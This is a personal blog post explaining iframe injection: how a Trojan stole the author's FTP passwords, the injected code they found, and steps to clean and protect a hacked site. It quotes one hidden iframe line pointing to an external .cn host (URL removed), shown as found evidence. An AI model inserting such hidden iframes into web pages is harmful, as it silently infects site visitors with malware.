What is IFRAME?
The iframe tag defines an inline frame that contains another document. We use iframe tag to include another document in inside website document.
For example, I use the following iframe code to insert Salesforce.com content syndicate inside my website. Please refer to the image below.
iframe id="blockrandom"
name="iframe" src="http://probyte2u.com/salesforce.html"
width="100%"
height="1300"
scrolling="auto"
align="top"
frameborder="0"
class="wrapper">
This option will not work correctly. Unfortunately, your browser does not support inline frames.
/iframe
Basically now you have some rough idea about IFRAME and it's usage !
Now what does IFRAME injection means ?
Iframe injections means attackers or hackers insert their iframe codes inside your website page. They use Trojan malware to do it.
Normally their will target your index.html, index.php, default.php or configuration.php page.
They will insert their codes inside your website, so when visitors visit your page they will download their malicious code inside your personal computer in order to replicate the process and also to retrieve financial and identification details of the visitor.
Their main purpose is for financial gain and some of them use it for their political purpose. They can also infect a lot of pc and use it to launch Distributed Denial of Service (DDoS) attack against their target.
From my own personal experience, I first encounter this problem when I tried to access my website and got the following error.
Parse error: syntax error, unexpected '/' in /home/+++++/public_html/index.php on line 85
So I checked in the index.php file and found the following code inserted inside the index.php file.
The iframe injection was not properly done, with additional "/" symbol at the start of the iframe injection as shown below, it was detected and the website coding does not download malicious code.
/
iframe src="http://{URL HAS BEEN REMOVED}.cn:8080/ts/in.cgi?pepsi49" width=125 height=125 style="visibility: hidden"
If the iframe injection was done properly, then all the visitors that visit the infected site will most probably get infected with malicious malware.
Sample of Mozilla Warning for Reported Attack Site shown below.
So what i did was that I removed the iframe injection from the infected file and upload the new files. Plus, I change ftp details for the website.
My site was safe for few days, unfortanely the same problem occurs after a while. I was suspucios how the hacker able to access my website.
So I checked with my hosting provider how my website was hacked.
Then only I knew that my personal computer was most probably infected by Trojan virus and the hacker has automated the whole process.
The Trojan virus managed to steal all my websites username and password that was saved in the file transfer protocal software that I used. All the websites that I used using the ftp software was infected with the iframe injection.
Luckily, I got back up files for my website that was not infected.
Since a lot of the files has been infected, I had no other choise but to restore the entire site using the backup file. I changed my ftp username and password.
To prevent the problem from recurring I install Kaspersky Internet Security and no more iframe injection problem
My root cause of my problem was that my Antivirus (Free Version) couldn't detect the Trojan at all.
If your problem is not as serious as mine.
Then you could resolve the problem using the steps below.
How to eliminate this problem
Use Kapersky Antivirus paid version , update the pattern and scan your computer. Clean all infected files in your computer.
How to clean the infected php or html pages in my web site?
1. Refer to Google badaware notice like this
Approximately 6 files have been injected. You can search your index.php, index.html for the lines of codes.
You can also download copies of your public_html if the injected files are too many (zip the public_html or folder by folders. Uncompress the zip file on your desktop. Kapersky will notify you the injected files. Do not clean the files. Just save the log file so you can edit manually. Using this method, your page will not be destroyed or altered by Kapersky.
2. Change your FTP/Cpanel Login information. Avoid using the same password for web registration. Your FTP password should not be recycled. Some fake web sites would harvest this information and perform iframe injection over the web.
3. Sort your files by dates in FTP window. You can check the latest edited pages (or infection date) for injected codes.
4. You can revert to public_html backup – this method is not advisable and should be used as last resort if you could not find the infected pages. If your pages have been infected for more than a month, most probably your backup files also contain the injected codes.
5. Plus remember not to safe the username and password of your website inside your file transfer protocal software. From my own experience, the Trojan virus managed to steal the information from the ftp software.
Không có nhận xét nào:
Đăng nhận xét